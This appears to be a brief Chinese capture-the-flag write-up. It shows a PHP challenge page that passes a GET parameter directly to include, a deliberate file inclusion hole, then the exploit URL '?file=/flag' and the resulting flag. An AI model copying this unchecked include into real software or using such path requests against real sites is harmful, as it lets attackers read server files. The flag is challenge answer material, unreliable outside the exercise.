题目
代码
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
直接修改url
http://3b1ee075-5de2-4de4-b1e8-d3de182e7043.node4.buuoj.cn:81/?file=/flag
就出现了flag
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
flag{ddc20fb5-be64-4cd1-8c0c-a716f648a755}